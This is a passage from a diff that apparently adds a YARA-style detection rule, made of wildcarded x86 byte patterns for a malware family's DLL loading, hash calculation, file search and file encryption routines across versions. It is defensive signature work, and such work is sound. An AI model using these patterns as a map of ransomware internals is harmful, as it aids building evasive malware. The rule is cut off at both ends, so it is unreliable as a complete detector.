+            ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 34 01 00 00 B9 ?? ?? ?? ?? 6B D1 ?? 8B 45 ?? 8B 4D ?? 03 4C 10 ?? 89 4D ?? 8B
+            55 ?? 8B 45 ?? 03 42 ?? 89 45 ?? 8B 4D ?? 8B 55 ?? 03 51 ?? 89 55 ?? 8B 45 ?? 8B 4D ?? 03 48 ?? 89 4D ?? C7 45 ?? ?? ??
+            ?? ?? EB 09 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 8B 4D ?? 3B 48 ?? 0F 83 DA 00 00 00 8B 55 ?? 8B 45 ?? 8B 4D ?? 03 0C 90
+            51 E8 ?? ?? ?? ?? 83 C4 ?? 3B 45 ?? 0F 85 B7 00 00 00 BA ?? ?? ?? ?? 6B C2 ?? 8B 4D ?? 8B 54 01 ?? 8B 44 01 ?? 89 55 ??
+            89 45 ?? 8B 4D ?? 8B 55 ?? 0F B7 04 4A 8B 4D ?? 8B 14 81 3B 55 ?? 76 71 8B 45 ?? 8B 4D ?? 0F B7 14 41 8B 45 ?? 03 45 ??
+            8B 4D ?? 39 04 91 73 59 8B 55 ?? 8B 45 ?? 0F B7 0C 50 8B 55 ?? 8B 45 ?? 03 04 8A 89 45 ?? 74 3F 6A ?? 8B 4D ?? 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 55 ?? 8D 44 02 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8D 45 ?? 50 6A ?? 8D 4D ??
+            51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 40 ?? FF D0 EB 16 8B 4D ?? 8B 55 ?? 0F B7 04 4A 8B 4D ?? 8B 55 ?? 03 14 81 89 55 ?? EB
+            05 E9 0E FF FF FF 8B 45 ?? 8B E5 5D C3
+        }
+		$v30_dll_load = {
+            55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 58 8B 45 ?? 8B 48 ?? 89 4D ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45
+            ?? 8B 08 89 4D ?? 8B 55 ?? 3B 55 ?? 74 36 8B 45 ?? 89 45 ?? 8B 4D ?? 0F B7 51 ?? D1 EA 52 8B 45 ?? 8B 48 ?? 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 3B 45 ?? 75 08 8B 55 ?? 8B 42 ?? EB 0C 8B 45 ?? 8B 08 89 4D ?? EB C2 33 C0 8B E5 5D C3
+        }
+		$v30_calculate_hash = {
+            55 8B EC 83 EC ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 5E 83 7D ?? ?? 74 58 8B 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 8B 55
+            ?? 83 EA ?? 89 55 ?? 83 7D ?? ?? 74 3D 8B 45 ?? 66 8B 08 66 89 4D ?? 8B 75 ?? C1 EE ?? 0F B7 55 ?? 52 E8 ?? ?? ?? ?? 83
+            C4 ?? 0F B7 C0 33 45 ?? 25 ?? ?? ?? ?? 33 34 85 ?? ?? ?? ?? 89 75 ?? 8B 4D ?? 83 C1 ?? 89 4D ?? EB AE 8B 45 ?? 83 F0 ??
+            5E 8B E5 5D C3
+        }
+		$v30_1_find_file_1 = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 47 02 00 00 E8 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 0F 84 32 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 68
+            ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ??
+            ?? 0F 84 B2 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 84 01 00
+            00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 83 E2 ?? 0F 85 A0 00 00 00 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 C0 0F 85 80 00 00 00 8D 4D ?? 51 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 69 C7 45 ?? ?? ??
+            ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 47 8B 45 ?? 50 8B 4D ?? 8B 11 52 8B
+            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 1C 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 51
+        }
+		$v30_1_find_file_2 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB 67 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75
+            54 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 8B 55 ?? 83 C2 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 32 8B 4D ?? 51 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 16 8B 55 ?? 52 8B 45 ?? 50 E8 30 FE FF FF 83 C4 ?? 03 45 ?? 89 45 ?? 8B 4D ?? 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 85 CE FE FF FF 8B 55 ?? 52 E8 ??
+            ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 74 2E 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 55 ?? 52 E8 ?? ?? ?? ?? 83
+            C4 ?? 3D ?? ?? ?? ?? 74 0E 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 89 4D ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3
+        }
+		$v30_2_find_file_1 = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 ( 3B | 3D ) 02 00 00 E8 ?? ?? ??
+            ?? 89 45 ?? 83 7D ?? ?? 0F 84 ( 26 | 28 ) 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ??
+            ?? ?? ?? FF D1 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 83 7D ?? ?? 0F 84 ( A6 | A8 ) 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ??
+            83 7D ?? ?? 0F 84 ( 78 | 7A ) 01 00 00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 83 E2 ?? 0F 85 94 00 00 00 C7 45 ?? ?? ?? ??
+            ?? 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 78 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 65 C7
+            45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 83 C0 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 43 8B 55 ?? 8B 02 50 8B
+        }
+		$v30_2_find_file_2 = {
+            4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 1C 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB 67 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75
+            54 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 83 C0 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 32 8B 55 ?? 52 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 16 8B 45 ?? 50 8B 4D ?? 51 E8 3C FE FF FF 83 C4 ?? 03 45 ?? 89 45 ?? 8B 55 ?? 52 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F 85 DA FE FF FF 8B 45 ?? 50 E8 ??
+            ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 83 7D ?? ?? 74 ( 2E | 30 ) 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 45 ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 74 ( 0E | 10 ) 6A ?? [0-2] 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 89 55 ?? 8B 45 ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3
+        }
+		$v30_3_find_file_1 = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 7C 02 00 00 E8 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 0F 84 67 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 68
+            ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ??
+            ?? 0F 84 E7 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 B9 01 00
+            00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 91 00 00 00 8D 55
+            ?? 52 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 7A 8B 4D ?? 8B 11 83 E2 ?? 75 70 C7 45 ?? ?? ?? ?? ?? 8D 45
+            ?? 50 8B 4D ?? 83 C1 ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 49 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52 8B 45 ?? 8B
+        }
+		$v30_3_find_file_2 = {
+            08 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 1C 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 88 00 00 00 8B 55 ?? 8B 02 83 E0 ?? 74 7E 8B 4D ?? 83 79 ?? ??
+            74 75 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 62 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? 51 8B
+            55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 40 8B 45 ?? 50 8B 4D ?? 8B 51 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 1D 8B 45
+            ?? 50 8B 4D ?? 51 E8 15 FE FF FF 83 C4 ?? 85 C0 74 09 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F 85 AC FE FF FF 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ??
+            ?? ?? ?? FF D2 8B 45 ?? 50 8B 4D ?? 8B 51 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 2E 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 74 0E 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 89
+            45 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3
+        }
+		$v20_1_encrypt_file_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 99 05 00 00 8B 45 ??
+            83 38 ?? 74 1B 8B 4D ?? 83 79 ?? ?? 74 12 8B 55 ?? 83 7A ?? ?? 74 09 8B 45 ?? 83 78 ?? ?? 75 08 8B 45 ?? E9 6E 05 00 00
+            8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ??
+            ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 F4 04 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B
+            4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 8D 45 ?? 50
+            8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 E7 03 00 00 66 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 6A ?? 6A ??
+            8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 AF 03 00 00
+            8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 97 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B
+            45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 6A 03 00 00 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 2C 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 D9 02 00 00
+        }
+		$v20_1_encrypt_file_2 = {
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 8B 48 ?? 51 8B 55 ??
+            8B 02 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 81 02 00 00 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B
+            4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 41 02 00 00 8B 55 ?? 8B 45 ?? 3B 42 ??
+            0F 85 32 02 00 00 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F
+            84 0B 02 00 00 8B 45 ?? 3B 45 ?? 0F 85 FF 01 00 00 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 C7 45 ?? ?? ?? ??
+            ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 CE 01 00 00 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 75 0C 8B 55 ?? 3B 55 ?? 0F 84 73 01 00 00 C7 45 ?? ??
+            ?? ?? ?? 8B 45 ?? 33 C9 8B 55 ?? 2B 55 ?? 8B 75 ?? 1B 75 ?? 89 85 ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 75 ?? 8B 45 ?? 3B 45
+            ?? 77 1A 72 0B 8B 8D ?? ?? ?? ?? 3B 4D ?? 73 0D 8B 55 ?? 33 C0 89 55 ?? 89 45 ?? EB 12 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55
+            ?? 89 4D ?? 89 55 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 33 D2 03 4D ?? 13 55 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 3B 45 ?? 75 12 8B 8D ?? ?? ?? ?? 3B 4D ?? 75 07 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B
+        }
+		$v20_1_encrypt_file_3 = {
+            55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F 84 A2 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 96 00 00 00 C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 74 60 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF
+            D1 85 C0 74 31 8B 55 ?? 3B 55 ?? 75 29 8B 45 ?? 33 C9 03 45 ?? 13 4D ?? 89 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ??
+            52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 02 EB 0D 83 7D ?? ?? 74 02
+            EB 05 E9 79 FE FF FF 83 7D ?? ?? 74 17 8B 55 ?? 3B 55 ?? 75 0F 8B 45 ?? 3B 45 ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ??
+            ?? 8B 90 ?? ?? ?? ?? FF D2 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ??
+            ?? ?? ?? FF D0 83 7D ?? ?? 74 0C 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0
+            83 7D ?? ?? 75 22 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 75 07 C7 45 ?? ?? ?? ?? ??
+            8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 60 6A ?? 6A ?? 6A ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 74 37 8D 95 ?? ?? ?? ?? 52 8D 85
+            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90
+            ?? ?? ?? ?? FF D2 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 5E 8B E5 5D C3
+        }
+		$v30_1_encrypt_file_1 = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 02 05 00 00 8B 45 ?? 83 38 ?? 74
+            09 8B 4D ?? 83 79 ?? ?? 75 08 8B 45 ?? E9 E9 04 00 00 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ??
+            FF D0 89 45 ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B
+            45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 6F 04 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 0F 85 90 03 00 00 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 F8 ?? 0F 84 70 03
+            00 00 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 50 03 00 00 8D 55 ?? 52 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 38 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ??
+            ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 83 7D ?? ?? 0F 84 04 03 00 00 6A ?? 6A ?? 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52 E8 ??
+            ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 CC 02 00 00 8B 4D ?? 3B 4D ?? 73 08 8B 55 ?? 89 55 ?? EB 06 8B 45 ?? 89
+            45 ?? 8B 4D ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 8B 45 ?? 8B 08 51 E8 ?? ?? ??
+            ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F 84 73 01 00 00 8B 45 ?? 8B 48 ?? 83 E9 ?? 89 4D ?? 8B 55 ?? D1 E2 89 55 ?? 8B 45 ??
+        }
+		$v30_1_encrypt_file_2 = {
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 35 01 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 2B 4D ?? 39 4D ?? 73 08 8B 55 ?? 89 55 ?? EB 09 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 4D
+            ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ??
+            FF D0 85 C0 0F 84 94 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 88 00 00 00 8B 55 ?? 3B 55 ?? 73 07 C7 45 ?? ?? ?? ?? ?? 83 7D ??
+            ?? 74 73 8B 45 ?? 89 45 ?? 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80
+            ?? ?? ?? ?? FF D0 85 C0 74 44 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF
+            D2 85 C0 74 21 8B 45 ?? 3B 45 ?? 75 19 8B 4D ?? 03 4D ?? 89 4D ?? 8B 55 ?? 03 55 ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? 83 7D
+            ?? ?? 74 06 83 7D ?? ?? 74 02 EB 0C 8B 45 ?? 3B 45 ?? 0F 85 FB FE FF FF 8B 4D ?? 3B 4D ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B
+            55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 83 7D ?? ?? 0F 85 02 01 00 00 C7 45
+            ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 DB 00 00 00 6A ?? 8D
+            4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 AE 00
+        }
+		$v30_1_encrypt_file_3 = {
+            00 00 8B 55 ?? 8B 45 ?? 3B 42 ?? 0F 85 9F 00 00 00 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88
+            ?? ?? ?? ?? FF D1 85 C0 74 7E 83 7D ?? ?? 75 78 8B 55 ?? 3B 55 ?? 74 1B 8B 45 ?? 8B 4D ?? 03 48 ?? 89 4D ?? 8B 55 ?? 2B
+            55 ?? 89 55 ?? 8B 45 ?? 89 45 ?? 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1
+            85 C0 74 34 83 7D ?? ?? 75 2E 6A ?? 8D 55 ?? 52 6A ?? 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85
+            C0 74 0D 83 7D ?? ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 EB 07 C7 45 ?? ?? ??
+            ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 75 71 83 7D ?? ?? 75 28 83 7D ?? ?? 75 22 68 ?? ??
